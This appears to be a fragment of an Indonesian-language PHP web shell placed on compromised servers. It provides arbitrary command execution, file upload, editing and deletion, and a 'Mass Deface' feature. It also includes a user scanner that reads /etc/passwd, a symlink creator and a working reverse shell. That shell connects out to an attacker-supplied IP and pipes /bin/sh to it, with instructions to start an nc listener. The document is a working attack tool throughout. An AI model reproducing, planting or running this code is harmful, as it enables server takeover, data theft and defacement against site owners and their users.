".htmlspecialchars($_GET['msg_text'])."
"; }
if(isset($_SESSION['feature_output'])) { echo 'Hasil Fitur Sebelumnya:
'.$_SESSION['feature_output'].'
| User / IP | |
| Host / Server | |
| System | |
:
/';
$current_built_path = '';
foreach($paths_array as $pat){
if(empty($pat)) continue;
$current_built_path .= '/' . $pat;
echo '
'.htmlspecialchars($pat).'/';
}
?>
';
switch ($_GET['action']) {
case 'cmd':
$cmd_output = (isset($_POST['do_cmd'])) ? htmlspecialchars(exe($_POST['cmd_input'])) : '';
echo 'Execute Command
';
if($cmd_output) echo 'Output:
'.$cmd_output.'
';
break;
case 'upload_form':
echo 'Upload File
';
break;
case 'create_form':
echo 'Create New
';
break;
case 'mass_deface_form':
echo 'Mass Deface
';
break;
case 'jumping':
echo ' Jumping (User Scanner)
Membaca /etc/passwd untuk menemukan semua user di server dan memeriksa akses direktori home.
';
if (is_readable('/etc/passwd')) {
preg_match_all('/(^[a-zA-Z0-9\._-]+):x:/m', file_get_contents('/etc/passwd'), $matches);
if(!empty($matches[1])){
echo '| Username | Home Directory | Status | Aksi |
|---|
';
foreach ($matches[1] as $user) {
$home_dir = '/home/' . $user;
if (is_readable($home_dir)) {
$status = 'Bisa Dibaca';
$action = 'Jelajahi';
} else {
$status = 'Tidak Bisa Dibaca';
$action = '-';
}
echo '| '.htmlspecialchars($user).' | '.htmlspecialchars($home_dir).' | '.$status.' | '.$action.' |
';
}
echo '
';
}
} else {
echo 'Gagal: File /etc/passwd tidak bisa dibaca.
';
}
break;
case 'symlink':
echo ' Symlink Creator
';
if (!function_exists('symlink')) {
echo 'Gagal: Fungsi symlink() dinonaktifkan di server ini.
';
} else {
if (isset($_POST['create_symlink'])) {
if (symlink($_POST['target_file'], $path . DIRECTORY_SEPARATOR . sanitizeFilename($_POST['link_name']))) {
echo 'Sukses! Symlink dibuat. Akses di: '.htmlspecialchars($path . DIRECTORY_SEPARATOR . sanitizeFilename($_POST['link_name'])).'
';
} else {
echo 'Gagal! Tidak bisa membuat symlink.
';
}
}
echo '';
}
break;
case 'reverse_shell':
echo ' Reverse Shell
';
if (!function_exists('fsockopen') || !function_exists('proc_open')) {
echo 'Gagal: Fungsi fsockopen() atau proc_open() dinonaktifkan.
';
} else {
$ip_attacker = isset($_POST['ip_attacker']) ? htmlspecialchars($_POST['ip_attacker']) : $_SERVER['REMOTE_ADDR'];
$port_attacker = isset($_POST['port_attacker']) ? htmlspecialchars($_POST['port_attacker']) : '4444';
echo ' Cara Pakai:
- Di terminalmu, jalankan listener:
nc -lvnp '.$port_attacker.' - Masukkan IP Publik komputermu di bawah.
- Klik "GASKEUN!". Halaman browser ini mungkin akan terus loading (normal).
- Cek terminalmu, shell server akan muncul jika berhasil.
Mencoba koneksi ke ".htmlspecialchars($_POST['ip_attacker']).":".htmlspecialchars($_POST['port_attacker'])." ...
";
if(ob_get_level()) ob_end_flush();
flush();
set_time_limit(0);
ignore_user_abort(true);
$sock = @fsockopen($_POST['ip_attacker'], (int)$_POST['port_attacker'], $errno, $errstr, 30);
if (!$sock) {
echo 'Koneksi Gagal! Pastikan listener sudah berjalan.
';
} else {
echo 'Koneksi Berhasil! Cek terminalmu sekarang!
';
if(ob_get_level()) ob_end_flush();
flush();
$process = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
if (is_resource($process)) proc_close($process);
}
}
}
break;
case 'ping':
$ping_output = (isset($_POST['do_ping'])) ? htmlspecialchars(exe("ping -c 4 ".escapeshellarg($_POST['target_host']))) : '';
echo 'Ping
';
if($ping_output) echo 'Output:
'.$ping_output.'
';
break;
case 'portscan':
$scan_output = (isset($_POST['do_scan'])) ? htmlspecialchars(exe("nmap -p ".escapeshellarg($_POST['ports'])." ".escapeshellarg($_POST['target_host']))) : '';
echo 'Port Scan (nmap)
';
if($scan_output) echo 'Output:
'.$scan_output.'
';
break;
case 'dnslookup':
$dns_output = (isset($_POST['do_lookup'])) ? htmlspecialchars(exe("dig ".escapeshellarg($_POST['target_domain'])." ".escapeshellarg($_POST['record_type']))) : '';
echo 'DNS Lookup (dig)
';
if($dns_output) echo 'Output:
'.$dns_output.'
';
break;
case 'whois':
$whois_output = (isset($_POST['do_whois'])) ? htmlspecialchars(exe("whois ".escapeshellarg($_POST['target_domain']))) : '';
echo 'Whois Lookup
';
if($whois_output) echo 'Output:
'.$whois_output.'
';
break;
case 'header':
$header_output = '';
if (isset($_POST['get_header'])) {
$url = $_POST['target_url'];
if(filter_var($url, FILTER_VALIDATE_URL)) {
$headers = get_headers($url, 1);
$header_output = htmlspecialchars(print_r($headers, true));
} else {
$header_output = 'URL tidak valid.';
}
}
echo 'HTTP Header Viewer
';
if($header_output) echo 'Output:
'.$header_output.'
';
break;
case 'curl':
echo 'cURL Downloader
';
break;
case 'delete':
echo 'Konfirmasi Hapus: '.htmlspecialchars(basename($_GET['target_file'])).'
Anda YAKIN? Tindakan ini tidak bisa dibatalkan.
';
break;
case 'extract_form':
echo 'Konfirmasi Ekstrak: '.htmlspecialchars(basename($_GET['target_file'])).'
Ekstrak semua isi file ini ke direktori saat ini ('.htmlspecialchars($path).')?
';
break;
case 'view_file':
echo 'Viewing: '.htmlspecialchars(basename($_GET['target_file'])).'
';
break;
case 'edit_form':
echo 'Editing: '.htmlspecialchars(basename($_GET['target_file'])).'
';
break;
case 'rename_form':
echo 'Rename: '.htmlspecialchars(basename($_GET['target_file'])).'
';
break;
case 'chmod_form':
$current_perms = substr(sprintf('%o', @fileperms($_GET['target_file'])), -4);
echo 'Chmod: '.htmlspecialchars(basename($_GET['target_file'])).'
';
break;
}
echo '';
}
if ($show_file_list) {
echo '';
}
?>